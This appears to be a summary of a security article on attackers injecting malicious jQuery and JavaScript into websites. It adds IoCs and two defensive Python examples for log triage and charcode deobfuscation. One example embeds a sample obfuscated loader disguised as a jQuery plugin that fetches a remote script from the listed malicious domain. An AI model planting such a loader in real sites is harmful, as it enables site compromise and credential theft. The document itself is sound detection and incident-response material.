Malicious JQuery & JavaScript – Threat Detection & Incident Response – Security Investigation

The article explains how attackers exploit jQuery and JavaScript to inject malicious code into legitimate websites, including disguising malware as legitimate jQuery plugins and stealing credentials through deceptive login forms. It also outlines an incident response plan with steps for identification, containment, analysis, eradication, recovery, and lessons learned. #jQuery #findtrustclicks #CyberChef #VirusTotal

Keypoints

  • Attackers inject malicious JavaScript into legitimate websites, often via vulnerabilities in content management systems.
  • Malware can be disguised as legitimate jQuery plugins to mislead site owners and users.
  • A fake login form is used to capture credentials by presenting a credential-stealing web form.
  • HTTP 3XX redirects to unknown domains indicate likely C2 activity and data exfiltration channels.
  • Payloads are obfuscated and encoded; CyberChef is used to decode the data and reveal the payload.
  • The investigation traces a malicious domain (record.findtrustclicks.com) and checks results in VirusTotal, highlighting suspicious infrastructure.
  • Root causes include outdated plugins and unpatched components; the article emphasizes ongoing incident response planning and regular updates to the plan.
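Two of the keypoints above (script loads from an unknown host and 3XX redirects to unknown domains) can be turned into a simple log triage pass. The following is an added example, not code from the socinvestigation.com article: it parses a batch of constructed log lines in a combined-log-like format whose last quoted field is a recorded Location header (a convention assumed here for the demo), and flags requests for .js files from hosts outside an allowlist and 3XX responses whose Location points off-site. The allowlist hosts are hypothetical; the flagged domain is the article's own IoC.

```python
"""Added example (not from the article): triage web/proxy log lines for the two
signals the article describes, namely scripts fetched from hosts outside a
known-origin allowlist and 3XX redirects to unknown domains."""
import re
from urllib.parse import urlparse

# Hypothetical first-party and CDN origins for the protected site.
ALLOWED_HOSTS = {"www.example-shop.test", "cdn.example-shop.test", "code.jquery.com"}

# Constructed sample lines. Format assumed here:
#   ip - - [ts] "METHOD target HTTP/x" status bytes "referer" "location"
LOG_LINES = [
    '10.0.0.5 - - [12/May/2024:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "-"',
    '10.0.0.5 - - [12/May/2024:10:01:03 +0000] "GET /wp-content/plugins/lazyload/state.js HTTP/1.1" 200 2210 "https://www.example-shop.test/" "-"',
    '10.0.0.5 - - [12/May/2024:10:01:04 +0000] "GET https://record.findtrustclicks.com/state.js?v=2.6.6 HTTP/1.1" 200 4410 "https://www.example-shop.test/" "-"',
    '10.0.0.5 - - [12/May/2024:10:01:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "https://www.example-shop.test/wp-login.php" "https://www.example-shop.test/wp-admin/"',
    '10.0.0.5 - - [12/May/2024:10:01:10 +0000] "POST /login HTTP/1.1" 302 0 "https://www.example-shop.test/" "https://record.findtrustclicks.com/collect"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<location>[^"]*)"$'
)


def host_of(target):
    """Hostname of an absolute URL, or None for a relative path (first-party)."""
    if "://" not in target:
        return None
    return urlparse(target).hostname


def is_script_request(target):
    """True when the requested path (query stripped) ends in .js."""
    path = urlparse(target).path if "://" in target else target.split("?", 1)[0]
    return path.lower().endswith(".js")


def triage(lines, allowed_hosts=ALLOWED_HOSTS):
    """Return (rule, host, raw_line) findings for the two detection rules."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        target, status = m["target"], int(m["status"])

        # Rule 1: a script fetched from a host that is not a known origin.
        host = host_of(target)
        if is_script_request(target) and host and host not in allowed_hosts:
            findings.append(("unknown-script-host", host, line))

        # Rule 2: a 3XX whose Location header points outside the allowlist.
        if 300 <= status < 400 and m["location"] not in ("", "-"):
            dest = host_of(m["location"])
            if dest and dest not in allowed_hosts:
                findings.append(("redirect-to-unknown-host", dest, line))
    return findings


if __name__ == "__main__":
    for rule, host, raw in triage(LOG_LINES):
        print(f"{rule:26} {host:30} {raw[:60]}...")
```

Both rules are allowlist-based on purpose: the article's point is that the redirect or script destination is an unknown domain, so anything not positively known is surfaced for a VirusTotal or WHOIS check rather than matched against a blocklist that would miss fresh infrastructure.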

MITRE Techniques

  • [T1059.007] JavaScript – “The attackers inject malicious JavaScript code into legitimate websites, often through vulnerabilities in the website’s content management system.”
  • [T1036] Masquerading – “disguising it as a legitimate jQuery plugin.”
  • [T1056.003] Web Form – “adds a form to a website that looks like a login form, but actually sends the user’s credentials to a server controlled by the attacker.”
  • [T1071.001] Web Protocols – “suspicious HTTP redirection status codes such as (3XX) to unknown domains.”
  • [T1027] Obfuscated/Compressed Files or Information – “Kim used the cyberchef tool to decipher the numbers above.”
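The T1027 entry describes CyberChef being used to "decipher the numbers" in the injected script. The article does not say which encoding the numbers used; the added example below (not the article's or CyberChef's code) assumes the common case of decimal character codes, as consumed by `String.fromCharCode`, and reproduces CyberChef's "From Charcode" step in Python so the decoded strings and the hosts they reference can be pulled out of a script automatically. The obfuscated script is constructed for the demo; the URL it hides is the article's own IoC.

```python
"""Added example (not from the article): recover strings hidden as numeric
character-code arrays in a script (the CyberChef "From Charcode" step) and list
the hosts those strings reference. Decimal char codes are an assumption."""
import re

# Constructed sample: a loader disguised as a jQuery plugin, with its real
# script URL stored as a decimal charcode array.
OBFUSCATED_SCRIPT = (
    "/* jQuery lazyload plugin v2.6.6 */\n"
    "var _0x=[104,116,116,112,115,58,47,47,114,101,99,111,114,100,46,102,105,110,"
    "100,116,114,117,115,116,99,108,105,99,107,115,46,99,111,109,47,115,116,97,"
    "116,101,46,106,115,63,118,61,50,46,54,46,54];\n"
    "var s=document.createElement('script');"
    "s.src=String.fromCharCode.apply(null,_0x);"
    "document.head.appendChild(s);\n"
)

# A bracketed list of at least two 1-3 digit integers.
CHARCODE_ARRAY_RE = re.compile(r"\[\s*((?:\d{1,3}\s*,\s*)+\d{1,3})\s*\]")
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def from_charcode(numbers):
    """Equivalent of CyberChef 'From Charcode' with decimal input."""
    return "".join(chr(int(n)) for n in numbers)


def extract_charcode_strings(script):
    """Decode every numeric array in the script that yields printable text."""
    decoded_strings = []
    for m in CHARCODE_ARRAY_RE.finditer(script):
        numbers = [n.strip() for n in m.group(1).split(",")]
        decoded = from_charcode(numbers)
        if decoded.isprintable():  # drop arrays that are just data, not text
            decoded_strings.append(decoded)
    return decoded_strings


def referenced_hosts(script):
    """Hosts named in the script, in cleartext or inside decoded arrays."""
    hosts = set()
    for text in extract_charcode_strings(script) + [script]:
        hosts.update(HOST_RE.findall(text))
    return sorted(hosts)


if __name__ == "__main__":
    for s in extract_charcode_strings(OBFUSCATED_SCRIPT):
        print("decoded:", s)
    print("hosts:", referenced_hosts(OBFUSCATED_SCRIPT))
```

The `isprintable()` filter matters in practice: jQuery-style plugins legitimately contain numeric arrays (lookup tables, dimensions), and only arrays that decode to readable text deserve an analyst's attention. The host list is what gets handed to VirusTotal, as in the article's investigation.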

Indicators of Compromise

  • [Domain] Malicious domain used for C2 – record.findtrustclicks.com (serving state.js?v=2.6.6)
  • [URL] Full malicious URL – https://record.findtrustclicks.com/state.js?v=2.6.6
  • [File name] Malicious script file – state.js

Read more: https://www.socinvestigation.com/malicious-jquery-javascript-threat-detection-incident-response/